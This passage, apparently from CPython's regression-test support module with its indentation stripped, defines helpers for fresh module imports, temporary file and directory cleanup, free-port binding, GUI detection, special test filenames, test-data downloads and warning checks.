Use of context managers to hide warnings make diffs
more noisy and tools like 'git blame' less useful.
"""
def decorator(test):
@functools.wraps(test)
def wrapper(self, *args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=category)
return test(self, *args, **kwargs)
return wrapper
return decorator
def import_module(name, deprecated=False, *, required_on=()):
"""Import and return the module to be tested, raising SkipTest if
it is not available.
If deprecated is True, any module or package deprecation messages
will be suppressed. If a module is required on a platform but optional for
others, set required_on to an iterable of platform prefixes which will be
compared against sys.platform.
"""
with _ignore_deprecated_imports(deprecated):
try:
return importlib.import_module(name)
except ImportError as msg:
if sys.platform.startswith(tuple(required_on)):
raise
raise unittest.SkipTest(str(msg))
def _save_and_remove_module(name, orig_modules):
"""Helper function to save and remove a module from sys.modules
Raise ImportError if the module can't be imported.
"""
# try to import the module and raise an error if it can't be imported
if name not in sys.modules:
__import__(name)
del sys.modules[name]
for modname in list(sys.modules):
if modname == name or modname.startswith(name + '.'):
orig_modules[modname] = sys.modules[modname]
del sys.modules[modname]
def _save_and_block_module(name, orig_modules):
"""Helper function to save and block a module in sys.modules
Return True if the module was in sys.modules, False otherwise.
"""
saved = True
try:
orig_modules[name] = sys.modules[name]
except KeyError:
saved = False
sys.modules[name] = None
return saved
def anticipate_failure(condition):
"""Decorator to mark a test that is known to be broken in some cases
Any use of this decorator should have a comment identifying the
associated tracker issue.
"""
if condition:
return unittest.expectedFailure
return lambda f: f
def load_package_tests(pkg_dir, loader, standard_tests, pattern):
"""Generic load_tests implementation for simple test packages.
Most packages can implement load_tests using this function as follows:
def load_tests(*args):
return load_package_tests(os.path.dirname(__file__), *args)
"""
if pattern is None:
pattern = "test*"
top_dir = os.path.dirname( # Lib
os.path.dirname( # test
os.path.dirname(__file__))) # support
package_tests = loader.discover(start_dir=pkg_dir,
top_level_dir=top_dir,
pattern=pattern)
standard_tests.addTests(package_tests)
return standard_tests
def import_fresh_module(name, fresh=(), blocked=(), deprecated=False):
"""Import and return a module, deliberately bypassing sys.modules.
This function imports and returns a fresh copy of the named Python module
by removing the named module from sys.modules before doing the import.
Note that unlike reload, the original module is not affected by
this operation.
*fresh* is an iterable of additional module names that are also removed
from the sys.modules cache before doing the import.
*blocked* is an iterable of module names that are replaced with None
in the module cache during the import to ensure that attempts to import
them raise ImportError.
The named module and any modules named in the *fresh* and *blocked*
parameters are saved before starting the import and then reinserted into
sys.modules when the fresh import is complete.
Module and package deprecation messages are suppressed during this import
if *deprecated* is True.
This function will raise ImportError if the named module cannot be
imported.
"""
# NOTE: test_heapq, test_json and test_warnings include extra sanity checks
# to make sure that this utility function is working as expected
with _ignore_deprecated_imports(deprecated):
# Keep track of modules saved for later restoration as well
# as those which just need a blocking entry removed
orig_modules = {}
names_to_remove = []
_save_and_remove_module(name, orig_modules)
try:
for fresh_name in fresh:
_save_and_remove_module(fresh_name, orig_modules)
for blocked_name in blocked:
if not _save_and_block_module(blocked_name, orig_modules):
names_to_remove.append(blocked_name)
fresh_module = importlib.import_module(name)
except ImportError:
fresh_module = None
finally:
for orig_name, module in orig_modules.items():
sys.modules[orig_name] = module
for name_to_remove in names_to_remove:
del sys.modules[name_to_remove]
return fresh_module
def get_attribute(obj, name):
"""Get an attribute, raising SkipTest if AttributeError is raised."""
try:
attribute = getattr(obj, name)
except AttributeError:
raise unittest.SkipTest("object %r has no attribute %r" % (obj, name))
else:
return attribute
verbose = 1 # Flag set to 0 by regrtest.py
use_resources = None # Flag set to [] by regrtest.py
max_memuse = 0 # Disable bigmem tests (they will still be run with
# small sizes, to make sure they work.)
real_max_memuse = 0
junit_xml_list = None # list of testsuite XML elements
failfast = False
# _original_stdout is meant to hold stdout at the time regrtest began.
# This may be "the real" stdout, or IDLE's emulation of stdout, or whatever.
# The point is to have some flavor of stdout the user can actually see.
_original_stdout = None
def record_original_stdout(stdout):
global _original_stdout
_original_stdout = stdout
def get_original_stdout():
return _original_stdout or sys.stdout
def unload(name):
try:
del sys.modules[name]
except KeyError:
pass
def _force_run(path, func, *args):
try:
return func(*args)
except OSError as err:
if verbose >= 2:
print('%s: %s' % (err.__class__.__name__, err))
print('re-run %s%r' % (func.__name__, args))
os.chmod(path, stat.S_IRWXU)
return func(*args)
if sys.platform.startswith("win"):
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or '.'
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an [email protected] shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn('tests may fail, delete still pending for ' + pathname,
RuntimeWarning, stacklevel=4)
def _unlink(filename):
_waitfor(os.unlink, filename)
def _rmdir(dirname):
_waitfor(os.rmdir, dirname)
def _rmtree(path):
def _rmtree_inner(path):
for name in _force_run(path, os.listdir, path):
fullname = os.path.join(path, name)
try:
mode = os.lstat(fullname).st_mode
except OSError as exc:
print("support.rmtree(): os.lstat(%r) failed with %s" % (fullname, exc),
file=sys.__stderr__)
mode = 0
if stat.S_ISDIR(mode):
_waitfor(_rmtree_inner, fullname, waitall=True)
_force_run(fullname, os.rmdir, fullname)
else:
_force_run(fullname, os.unlink, fullname)
_waitfor(_rmtree_inner, path, waitall=True)
_waitfor(lambda p: _force_run(p, os.rmdir, p), path)
def _longpath(path):
try:
import ctypes
except ImportError:
# No ctypes means we can't expands paths.
pass
else:
buffer = ctypes.create_unicode_buffer(len(path) * 2)
length = ctypes.windll.kernel32.GetLongPathNameW(path, buffer,
len(buffer))
if length:
return buffer[:length]
return path
else:
_unlink = os.unlink
_rmdir = os.rmdir
def _rmtree(path):
try:
shutil.rmtree(path)
return
except OSError:
pass
def _rmtree_inner(path):
for name in _force_run(path, os.listdir, path):
fullname = os.path.join(path, name)
try:
mode = os.lstat(fullname).st_mode
except OSError:
mode = 0
if stat.S_ISDIR(mode):
_rmtree_inner(fullname)
_force_run(path, os.rmdir, fullname)
else:
_force_run(path, os.unlink, fullname)
_rmtree_inner(path)
os.rmdir(path)
def _longpath(path):
return path
def unlink(filename):
try:
_unlink(filename)
except (FileNotFoundError, NotADirectoryError):
pass
def rmdir(dirname):
try:
_rmdir(dirname)
except FileNotFoundError:
pass
def rmtree(path):
try:
_rmtree(path)
except FileNotFoundError:
pass
def make_legacy_pyc(source):
"""Move a PEP 3147/488 pyc file to its legacy pyc location.
:param source: The file system path to the source file. The source file
does not need to exist, however the PEP 3147/488 pyc file must exist.
:return: The file system path to the legacy pyc file.
"""
pyc_file = importlib.util.cache_from_source(source)
up_one = os.path.dirname(os.path.abspath(source))
legacy_pyc = os.path.join(up_one, source + 'c')
os.rename(pyc_file, legacy_pyc)
return legacy_pyc
def forget(modname):
"""'Forget' a module was ever imported.
This removes the module from sys.modules and deletes any PEP 3147/488 or
legacy .pyc files.
"""
unload(modname)
for dirname in sys.path:
source = os.path.join(dirname, modname + '.py')
# It doesn't matter if they exist or not, unlink all possible
# combinations of PEP 3147/488 and legacy pyc files.
unlink(source + 'c')
for opt in ('', 1, 2):
unlink(importlib.util.cache_from_source(source, optimization=opt))
# Check whether a gui is actually available
def _is_gui_available():
if hasattr(_is_gui_available, 'result'):
return _is_gui_available.result
reason = None
if sys.platform.startswith('win'):
# if Python is running as a service (such as the buildbot service),
# gui interaction may be disallowed
import ctypes
import ctypes.wintypes
UOI_FLAGS = 1
WSF_VISIBLE = 0x0001
class USEROBJECTFLAGS(ctypes.Structure):
_fields_ = [("fInherit", ctypes.wintypes.BOOL),
("fReserved", ctypes.wintypes.BOOL),
("dwFlags", ctypes.wintypes.DWORD)]
dll = ctypes.windll.user32
h = dll.GetProcessWindowStation()
if not h:
raise ctypes.WinError()
uof = USEROBJECTFLAGS()
needed = ctypes.wintypes.DWORD()
res = dll.GetUserObjectInformationW(h,
UOI_FLAGS,
ctypes.byref(uof),
ctypes.sizeof(uof),
ctypes.byref(needed))
if not res:
raise ctypes.WinError()
if not bool(uof.dwFlags & WSF_VISIBLE):
reason = "gui not available (WSF_VISIBLE flag not set)"
elif sys.platform == 'darwin':
# The Aqua Tk implementations on OS X can abort the process if
# being called in an environment where a window server connection
# cannot be made, for instance when invoked by a buildbot or ssh
# process not running under the same user id as the current console
# user. To avoid that, raise an exception if the window manager
# connection is not available.
from ctypes import cdll, c_int, pointer, Structure
from ctypes.util import find_library
app_services = cdll.LoadLibrary(find_library("ApplicationServices"))
if app_services.CGMainDisplayID() == 0:
reason = "gui tests cannot run without OS X window manager"
else:
class ProcessSerialNumber(Structure):
_fields_ = [("highLongOfPSN", c_int),
("lowLongOfPSN", c_int)]
psn = ProcessSerialNumber()
psn_p = pointer(psn)
if ( (app_services.GetCurrentProcess(psn_p) < 0) or
(app_services.SetFrontProcess(psn_p) < 0) ):
reason = "cannot run without OS X gui process"
# check on every platform whether tkinter can actually do anything
if not reason:
try:
from tkinter import Tk
root = Tk()
root.withdraw()
root.update()
root.destroy()
except Exception as e:
err_string = str(e)
if len(err_string) > 50:
err_string = err_string[:50] + ' [...]'
reason = 'Tk unavailable due to {}: {}'.format(type(e).__name__,
err_string)
_is_gui_available.reason = reason
_is_gui_available.result = not reason
return _is_gui_available.result
def is_resource_enabled(resource):
"""Test whether a resource is enabled.
Known resources are set by regrtest.py. If not running under regrtest.py,
all resources are assumed enabled unless use_resources has been set.
"""
return use_resources is None or resource in use_resources
def requires(resource, msg=None):
"""Raise ResourceDenied if the specified resource is not available."""
if not is_resource_enabled(resource):
if msg is None:
msg = "Use of the %r resource not enabled" % resource
raise ResourceDenied(msg)
if resource == 'gui' and not _is_gui_available():
raise ResourceDenied(_is_gui_available.reason)
def _requires_unix_version(sysname, min_version):
"""Decorator raising SkipTest if the OS is `sysname` and the version is less
than `min_version`.
For example, @_requires_unix_version('FreeBSD', (7, 2)) raises SkipTest if
the FreeBSD version is less than 7.2.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if platform.system() == sysname:
version_txt = platform.release().split('-', 1)[0]
try:
version = tuple(map(int, version_txt.split('.')))
except ValueError:
pass
else:
if version < min_version:
min_version_txt = '.'.join(map(str, min_version))
raise unittest.SkipTest(
"%s version %s or higher required, not %s"
% (sysname, min_version_txt, version_txt))
return func(*args, **kw)
wrapper.min_version = min_version
return wrapper
return decorator
def requires_freebsd_version(*min_version):
"""Decorator raising SkipTest if the OS is FreeBSD and the FreeBSD version is
less than `min_version`.
For example, @requires_freebsd_version(7, 2) raises SkipTest if the FreeBSD
version is less than 7.2.
"""
return _requires_unix_version('FreeBSD', min_version)
def requires_linux_version(*min_version):
"""Decorator raising SkipTest if the OS is Linux and the Linux version is
less than `min_version`.
For example, @requires_linux_version(2, 6, 32) raises SkipTest if the Linux
version is less than 2.6.32.
"""
return _requires_unix_version('Linux', min_version)
def requires_mac_ver(*min_version):
"""Decorator raising SkipTest if the OS is Mac OS X and the OS X
version if less than min_version.
For example, @requires_mac_ver(10, 5) raises SkipTest if the OS X version
is lesser than 10.5.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if sys.platform == 'darwin':
version_txt = platform.mac_ver()[0]
try:
version = tuple(map(int, version_txt.split('.')))
except ValueError:
pass
else:
if version < min_version:
min_version_txt = '.'.join(map(str, min_version))
raise unittest.SkipTest(
"Mac OS X %s or higher required, not %s"
% (min_version_txt, version_txt))
return func(*args, **kw)
wrapper.min_version = min_version
return wrapper
return decorator
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
def find_unused_port(family=socket.AF_INET, socktype=socket.SOCK_STREAM):
"""Returns an unused port that should be suitable for binding. This is
achieved by creating a temporary socket with the same family and type as
the 'sock' parameter (default is AF_INET, SOCK_STREAM), and binding it to
the specified host address (defaults to 0.0.0.0) with the port set to 0,
eliciting an unused ephemeral port from the OS. The temporary socket is
then closed and deleted, and the ephemeral port is returned.
Either this method or bind_port() should be used for any tests where a
server socket needs to be bound to a particular port for the duration of
the test. Which one to use depends on whether the calling code is creating
a python socket, or if an unused port needs to be provided in a constructor
or passed to an external program (i.e. the -accept argument to openssl's
s_server mode). Always prefer bind_port() over find_unused_port() where
possible. Hard coded ports should *NEVER* be used. As soon as a server
socket is bound to a hard coded port, the ability to run multiple instances
of the test simultaneously on the same host is compromised, which makes the
test a ticking time bomb in a buildbot environment. On Unix buildbots, this
may simply manifest as a failed test, which can be recovered from without
intervention in most cases, but on Windows, the entire python process can
completely and utterly wedge, requiring someone to log in to the buildbot
and manually kill the affected process.
(This is easy to reproduce on Windows, unfortunately, and can be traced to
the SO_REUSEADDR socket option having different semantics on Windows versus
Unix/Linux. On Unix, you can't have two AF_INET SOCK_STREAM sockets bind,
listen and then accept connections on identical host/ports. An EADDRINUSE
OSError will be raised at some point (depending on the platform and
the order bind and listen were called on each socket).
However, on Windows, if SO_REUSEADDR is set on the sockets, no EADDRINUSE
will ever be raised when attempting to bind two identical host/ports. When
accept() is called on each socket, the second caller's process will steal
the port from the first caller, leaving them both in an awkwardly wedged
state where they'll no longer respond to any signals or graceful kills, and
must be forcibly killed via OpenProcess()/TerminateProcess().
The solution on Windows is to use the SO_EXCLUSIVEADDRUSE socket option
instead of SO_REUSEADDR, which effectively affords the same semantics as
SO_REUSEADDR on Unix. Given the propensity of Unix developers in the Open
Source world compared to Windows ones, this is a common mistake. A quick
look over OpenSSL's 0.9.8g source shows that they use SO_REUSEADDR when
openssl.exe is called with the 's_server' option, for example. See
http://bugs.python.org/issue2550 for more info. The following site also
has a very thorough description about the implications of both REUSEADDR
and EXCLUSIVEADDRUSE on Windows:
http://msdn2.microsoft.com/en-us/library/ms740621(VS.85).aspx)
XXX: although this approach is a vast improvement on previous attempts to
elicit unused ports, it rests heavily on the assumption that the ephemeral
port returned to us by the OS won't immediately be dished back out to some
other process when we close and delete our temporary socket but before our
calling code has a chance to bind the returned port. We can deal with this
issue if/when we come across it.
"""
tempsock = socket.socket(family, socktype)
port = bind_port(tempsock)
tempsock.close()
del tempsock
return port
def bind_port(sock, host=HOST):
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, 'SO_REUSEADDR'):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise TestFailed("tests should never set the SO_REUSEADDR " \
"socket option on TCP/IP sockets!")
if hasattr(socket, 'SO_REUSEPORT'):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise TestFailed("tests should never set the SO_REUSEPORT " \
"socket option on TCP/IP sockets!")
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, 'SO_EXCLUSIVEADDRUSE'):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
def bind_unix_socket(sock, addr):
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest('cannot bind AF_UNIX sockets')
def _is_ipv6_enabled():
"""Check whether IPv6 is enabled on this host."""
if socket.has_ipv6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind((HOSTv6, 0))
return True
except OSError:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
def system_must_validate_cert(f):
"""Skip the test on TLS certificate validation failures."""
@functools.wraps(f)
def dec(*args, **kwargs):
try:
f(*args, **kwargs)
except OSError as e:
if "CERTIFICATE_VERIFY_FAILED" in str(e):
raise unittest.SkipTest("system does not contain "
"necessary certificates")
raise
return dec
# A constant likely larger than the underlying OS pipe buffer size, to
# make writes blocking.
# Windows limit seems to be around 512 B, and many Unix kernels have a
# 64 KiB pipe buffer size or 16 * PAGE_SIZE: take a few megs to be sure.
# (see issue #17835 for a discussion of this number).
PIPE_MAX_SIZE = 4 * 1024 * 1024 + 1
# A constant likely larger than the underlying OS socket buffer size, to make
# writes blocking.
# The socket buffer sizes can usually be tuned system-wide (e.g. through sysctl
# on Linux), or on a per-socket basis (SO_SNDBUF/SO_RCVBUF). See issue #18643
# for a discussion of this number).
SOCK_MAX_SIZE = 16 * 1024 * 1024 + 1
# decorator for skipping tests on non-IEEE 754 platforms
requires_IEEE_754 = unittest.skipUnless(
float.__getformat__("double").startswith("IEEE"),
"test requires IEEE 754 doubles")
requires_zlib = unittest.skipUnless(zlib, 'requires zlib')
requires_gzip = unittest.skipUnless(gzip, 'requires gzip')
requires_bz2 = unittest.skipUnless(bz2, 'requires bz2')
requires_lzma = unittest.skipUnless(lzma, 'requires lzma')
is_jython = sys.platform.startswith('java')
is_android = hasattr(sys, 'getandroidapilevel')
if sys.platform != 'win32':
unix_shell = '/system/bin/sh' if is_android else '/bin/sh'
else:
unix_shell = None
# Filename used for testing
if os.name == 'java':
# Jython disallows @ in module names
TESTFN = '$test'
else:
TESTFN = '@test'
# Disambiguate TESTFN for parallel testing, while letting it remain a valid
# module name.
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
# FS_NONASCII: non-ASCII character encodable by os.fsencode(),
# or None if there is no such character.
FS_NONASCII = None
for character in (
# First try printable and common characters to have a readable filename.
# For each character, the encoding list are just example of encodings able
# to encode the character (the list is not exhaustive).
# U+00E6 (Latin Small Letter Ae): cp1252, iso-8859-1
'\u00E6',
# U+0130 (Latin Capital Letter I With Dot Above): cp1254, iso8859_3
'\u0130',
# U+0141 (Latin Capital Letter L With Stroke): cp1250, cp1257
'\u0141',
# U+03C6 (Greek Small Letter Phi): cp1253
'\u03C6',
# U+041A (Cyrillic Capital Letter Ka): cp1251
'\u041A',
# U+05D0 (Hebrew Letter Alef): Encodable to cp424
'\u05D0',
# U+060C (Arabic Comma): cp864, cp1006, iso8859_6, mac_arabic
'\u060C',
# U+062A (Arabic Letter Teh): cp720
'\u062A',
# U+0E01 (Thai Character Ko Kai): cp874
'\u0E01',
# Then try more "special" characters. "special" because they may be
# interpreted or displayed differently depending on the exact locale
# encoding and the font.
# U+00A0 (No-Break Space)
'\u00A0',
# U+20AC (Euro Sign)
'\u20AC',
):
try:
os.fsdecode(os.fsencode(character))
except UnicodeError:
pass
else:
FS_NONASCII = character
break
# TESTFN_UNICODE is a non-ascii filename
TESTFN_UNICODE = TESTFN + "-\xe0\xf2\u0258\u0141\u011f"
if sys.platform == 'darwin':
# In Mac OS X's VFS API file names are, by definition, canonically
# decomposed Unicode, encoded using UTF-8. See QA1173:
# http://developer.apple.com/mac/library/qa/qa2001/qa1173.html
import unicodedata
TESTFN_UNICODE = unicodedata.normalize('NFD', TESTFN_UNICODE)
TESTFN_ENCODING = sys.getfilesystemencoding()
# TESTFN_UNENCODABLE is a filename (str type) that should *not* be able to be
# encoded by the filesystem encoding (in strict mode). It can be None if we
# cannot generate such filename.
TESTFN_UNENCODABLE = None
if os.name == 'nt':
# skip win32s (0) or Windows 9x/ME (1)
if sys.getwindowsversion().platform >= 2:
# Different kinds of characters from various languages to minimize the
# probability that the whole name is encodable to MBCS (issue #9819)
TESTFN_UNENCODABLE = TESTFN + "-\u5171\u0141\u2661\u0363\uDC80"
try:
TESTFN_UNENCODABLE.encode(TESTFN_ENCODING)
except UnicodeEncodeError:
pass
else:
print('WARNING: The filename %r CAN be encoded by the filesystem encoding (%s). '
'Unicode filename tests may not be effective'
% (TESTFN_UNENCODABLE, TESTFN_ENCODING))
TESTFN_UNENCODABLE = None
# Mac OS X denies unencodable filenames (invalid utf-8)
elif sys.platform != 'darwin':
try:
# ascii and utf-8 cannot encode the byte 0xff
b'\xff'.decode(TESTFN_ENCODING)
except UnicodeDecodeError:
# 0xff will be encoded using the surrogate character u+DCFF
TESTFN_UNENCODABLE = TESTFN \
+ b'-\xff'.decode(TESTFN_ENCODING, 'surrogateescape')
else:
# File system encoding (eg. ISO-8859-* encodings) can encode
# the byte 0xff. Skip some unicode filename tests.
pass
# TESTFN_UNDECODABLE is a filename (bytes type) that should *not* be able to be
# decoded from the filesystem encoding (in strict mode). It can be None if we
# cannot generate such filename (ex: the latin1 encoding can decode any byte
# sequence). On UNIX, TESTFN_UNDECODABLE can be decoded by os.fsdecode() thanks
# to the surrogateescape error handler (PEP 383), but not from the filesystem
# encoding in strict mode.
TESTFN_UNDECODABLE = None
for name in (
# b'\xff' is not decodable by os.fsdecode() with code page 932. Windows
# accepts it to create a file or a directory, or don't accept to enter to
# such directory (when the bytes name is used). So test b'\xe7' first: it is
# not decodable from cp932.
b'\xe7w\xf0',
# undecodable from ASCII, UTF-8
b'\xff',
# undecodable from iso8859-3, iso8859-6, iso8859-7, cp424, iso8859-8, cp856
# and cp857
b'\xae\xd5'
# undecodable from UTF-8 (UNIX and Mac OS X)
b'\xed\xb2\x80', b'\xed\xb4\x80',
# undecodable from shift_jis, cp869, cp874, cp932, cp1250, cp1251, cp1252,
# cp1253, cp1254, cp1255, cp1257, cp1258
b'\x81\x98',
):
try:
name.decode(TESTFN_ENCODING)
except UnicodeDecodeError:
TESTFN_UNDECODABLE = os.fsencode(TESTFN) + name
break
if FS_NONASCII:
TESTFN_NONASCII = TESTFN + '-' + FS_NONASCII
else:
TESTFN_NONASCII = None
# Save the initial cwd
SAVEDCWD = os.getcwd()
# Set by libregrtest/main.py so we can skip tests that are not
# useful for PGO
PGO = False
@contextlib.contextmanager
def temp_dir(path=None, quiet=False):
"""Return a context manager that creates a temporary directory.
Arguments:
path: the directory to create temporarily. If omitted or None,
defaults to creating a temporary directory using tempfile.mkdtemp.
quiet: if False (the default), the context manager raises an exception
on error. Otherwise, if the path is specified and cannot be
created, only a warning is issued.
"""
dir_created = False
if path is None:
path = tempfile.mkdtemp()
dir_created = True
path = os.path.realpath(path)
else:
try:
os.mkdir(path)
dir_created = True
except OSError as exc:
if not quiet:
raise
warnings.warn(f'tests may fail, unable to create '
f'temporary directory {path!r}: {exc}',
RuntimeWarning, stacklevel=3)
if dir_created:
pid = os.getpid()
try:
yield path
finally:
# In case the process forks, let only the parent remove the
# directory. The child has a diffent process id. (bpo-30028)
if dir_created and pid == os.getpid():
rmtree(path)
@contextlib.contextmanager
def change_cwd(path, quiet=False):
"""Return a context manager that changes the current working directory.
Arguments:
path: the directory to use as the temporary current working directory.
quiet: if False (the default), the context manager raises an exception
on error. Otherwise, it issues only a warning and keeps the current
working directory the same.
"""
saved_dir = os.getcwd()
try:
os.chdir(path)
except OSError as exc:
if not quiet:
raise
warnings.warn(f'tests may fail, unable to change the current working '
f'directory to {path!r}: {exc}',
RuntimeWarning, stacklevel=3)
try:
yield os.getcwd()
finally:
os.chdir(saved_dir)
@contextlib.contextmanager
def temp_cwd(name='tempcwd', quiet=False):
"""
Context manager that temporarily creates and changes the CWD.
The function temporarily changes the current working directory
after creating a temporary directory in the current directory with
name *name*. If *name* is None, the temporary directory is
created using tempfile.mkdtemp.
If *quiet* is False (default) and it is not possible to
create or change the CWD, an error is raised. If *quiet* is True,
only a warning is raised and the original CWD is used.
"""
with temp_dir(path=name, quiet=quiet) as temp_path:
with change_cwd(temp_path, quiet=quiet) as cwd_dir:
yield cwd_dir
if hasattr(os, "umask"):
@contextlib.contextmanager
def temp_umask(umask):
"""Context manager that temporarily sets the process umask."""
oldmask = os.umask(umask)
try:
yield
finally:
os.umask(oldmask)
# TEST_HOME_DIR refers to the top level directory of the "test" package
# that contains Python's regression test suite
TEST_SUPPORT_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_HOME_DIR = os.path.dirname(TEST_SUPPORT_DIR)
# TEST_DATA_DIR is used as a target download location for remote resources
TEST_DATA_DIR = os.path.join(TEST_HOME_DIR, "data")
def findfile(filename, subdir=None):
"""Try to find a file on sys.path or in the test directory. If it is not
found the argument passed to the function is returned (this does not
necessarily signal failure; could still be the legitimate path).
Setting *subdir* indicates a relative path to use to find the file
rather than looking directly in the path directories.
"""
if os.path.isabs(filename):
return filename
if subdir is not None:
filename = os.path.join(subdir, filename)
path = [TEST_HOME_DIR] + sys.path
for dn in path:
fn = os.path.join(dn, filename)
if os.path.exists(fn): return fn
return filename
def create_empty_file(filename):
"""Create an empty file. If the file already exists, truncate it."""
fd = os.open(filename, os.O_WRONLY | os.O_CREAT | os.O_TRUNC)
os.close(fd)
def sortdict(dict):
"Like repr(dict), but in sorted order."
items = sorted(dict.items())
reprpairs = ["%r: %r" % pair for pair in items]
withcommas = ", ".join(reprpairs)
return "{%s}" % withcommas
def make_bad_fd():
"""
Create an invalid file descriptor by opening and closing a file and return
its fd.
"""
file = open(TESTFN, "wb")
try:
return file.fileno()
finally:
file.close()
unlink(TESTFN)
def check_syntax_error(testcase, statement, errtext='', *, lineno=None, offset=None):
with testcase.assertRaisesRegex(SyntaxError, errtext) as cm:
compile(statement, '<test string>', 'exec')
err = cm.exception
testcase.assertIsNotNone(err.lineno)
if lineno is not None:
testcase.assertEqual(err.lineno, lineno)
testcase.assertIsNotNone(err.offset)
if offset is not None:
testcase.assertEqual(err.offset, offset)
def open_urlresource(url, *args, **kw):
import urllib.request, urllib.parse
check = kw.pop('check', None)
filename = urllib.parse.urlparse(url)[2].split('/')[-1] # '/': it's URL!
fn = os.path.join(TEST_DATA_DIR, filename)
def check_valid_file(fn):
f = open(fn, *args, **kw)
if check is None:
return f
elif check(f):
f.seek(0)
return f
f.close()
if os.path.exists(fn):
f = check_valid_file(fn)
if f is not None:
return f
unlink(fn)
# Verify the requirement before downloading the file
requires('urlfetch')
if verbose:
print('\tfetching %s ...' % url, file=get_original_stdout())
opener = urllib.request.build_opener()
if gzip:
opener.addheaders.append(('Accept-Encoding', 'gzip'))
f = opener.open(url, timeout=15)
if gzip and f.headers.get('Content-Encoding') == 'gzip':
f = gzip.GzipFile(fileobj=f)
try:
with open(fn, "wb") as out:
s = f.read()
while s:
out.write(s)
s = f.read()
finally:
f.close()
f = check_valid_file(fn)
if f is not None:
return f
raise TestFailed('invalid resource %r' % fn)
class WarningsRecorder(object):
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
def __getattr__(self, attr):
if len(self._warnings) > self._last:
return getattr(self._warnings[-1], attr)
elif attr in warnings.WarningMessage._WARNING_DETAILS:
return None
raise AttributeError("%r has no attribute %r" % (self, attr))
@property
def warnings(self):
return self._warnings[self._last:]
def reset(self):
self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False):
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get('__warningregistry__')
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swap the module, we need to look up in
# the sys.modules dictionary.
sys.modules['warnings'].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if (re.match(msg, str(warning), re.I) and
issubclass(warning.__class__, cat)):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" %
missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs):
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get('quiet')
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
@contextlib.contextmanager
def check_no_warnings(testcase, message='', category=Warning, force_gc=False):
"""Context manager to check that no warnings are emitted.
This context manager enables a given warning within its scope
and checks that no warnings are emitted even with that warning
enabled.
If force_gc is True, a garbage collection is attempted before checking
for warnings. This may help to catch warnings emitted when objects
are deleted, such as ResourceWarning.
Other keyword arguments are passed to warnings.filterwarnings().
"""
with warnings.catch_warnings(record=True) as warns:
warnings.filterwarnings('always',
message=message,
category=category)
yield
if force_gc:
gc_collect()
testcase.assertEqual(warns, [])
@contextlib.contextmanager
def check_no_resource_warning(testcase):
"""Context manager to check that no ResourceWarning is emitted.
Usage:
with check_no_resource_warning(self):
f = open(...)
...
del f
You must remove the object which may emit ResourceWarning before
the end of the context manager.
"""
